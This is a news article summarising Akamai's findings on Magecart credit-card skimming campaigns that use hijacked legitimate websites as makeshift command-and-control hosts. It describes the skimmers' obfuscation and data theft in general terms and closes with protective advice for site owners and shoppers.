Magecart attacks exploit legitimate sites as C2 servers for credit card theft

Emre Çitak
Jun 5, 2023

A new breed of attacks known as Magecart attacks have emerged, targeting online stores to pilfer customers' credit card information and personal data during the checkout process.

These attacks employ sophisticated techniques, including the hijacking of legitimate websites to act as "makeshift" command and control (C2) servers, enabling hackers to inject and conceal credit card skimmers on targeted eCommerce platforms.

Magecart attacks hijack legitimate sites for malicious purposes

The Magecart attack technique involves hackers identifying vulnerable legitimate websites and exploiting them as hosts for their malicious code, using them as C2 servers for their operations. By leveraging reputable websites with a strong online presence, threat actors evade detection and bypass security measures, eliminating the need to set up their own infrastructure.

This strategy offers them a significant advantage in terms of concealment and enables them to reach a broader range of potential victims.

Magecart attacks
Magecart attacks exploit the vulnerabilities of sites to use them as C2 servers for their operations

One of the most concerning aspects of Magecart attacks is the stealthiness with which they operate. Many victimized organizations remain unaware of the breach for an extended period, sometimes surpassing a month. This prolonged period of undetected compromise underscores the craftiness and sophistication of these attacks.

Cybersecurity firm Akamai, which has been closely monitoring these campaigns, reveals that organizations in several countries, including the United States, the United Kingdom, Australia, Brazil, Peru, and Estonia, have fallen victim to these attacks.

Targetting common platforms

To initiate the attack, hackers exploit vulnerabilities within the targeted websites' digital commerce platforms, such as Magento, WooCommerce, WordPress, Shopify, and other commonly used platforms. They may also target weaknesses in third-party services employed by the websites.

Though the precise methods of breaching these websites remain undisclosed, previous research on similar campaigns suggests that hackers exploit known vulnerabilities within these systems.

Once a vulnerable platform is compromised, the attackers proceed to inject a small JavaScript snippet into the targeted eCommerce sites. This snippet fetches the malicious code from previously compromised legitimate websites, effectively integrating the credit card skimmers into the victims' platforms.

By camouflaging the skimmer with Base64 encoding and structuring it to resemble popular third-party services like Google Tag Manager or Facebook Pixel, the attackers successfully evade suspicion and detection.

The two faces of Magecart skimmers

Akamai's researchers have identified two variants of the credit card skimmers used in Magecart atacks. The first variant is heavily obfuscated, containing a list of CSS selectors specifically designed to target customer personally identifiable information (PII) and credit card details. Each targeted site has its custom-made CSS selectors, increasing the likelihood of successful data theft.

The second skimmer variant, while less protected, exposes indicators within its code, aiding Akamai in mapping the extent of the campaign and identifying additional victims.

Once the skimmers collect customers' data, it is transmitted to the attackers' servers via an HTTP request disguised as an IMG tag within the skimmer. To further conceal the stolen data, Base64 encoding is applied, minimizing the chances of victims discovering the breach.

Magecart attacks
Magecart attacks use two methods to steal credit card information

How to protect your sites against Magecart attacks

Website owners can adopt several measures to defend against Magecart infections. Strengthening website admin accounts, applying timely security updates for CMS and plugins, and conducting regular security audits are vital steps in mitigating the risks posed by Magecart attacks.

By proactively addressing vulnerabilities and implementing robust security practices, organizations can reduce the likelihood of falling victim to these malicious campaigns.

Minimizing risks for customers

While the onus primarily falls on website owners to protect against Magecart attacks, customers can also take steps to minimize their risks. Opting for electronic payment methods, utilizing virtual cards, or setting charge limits on their credit cards can provide an additional layer of security and reduce the potential impact of data exposure.


Tutorials & Tips

Previous Post: «
Next Post: «


There are no comments on this post yet, be the first one to share your thoughts!

Leave a Reply

Check the box to consent to your data being stored in line with the guidelines set out in our privacy policy

We love comments and welcome thoughtful and civilized discussion. Rudeness and personal attacks will not be tolerated. Please stay on-topic.
Please note that your comment may not appear immediately after you post it.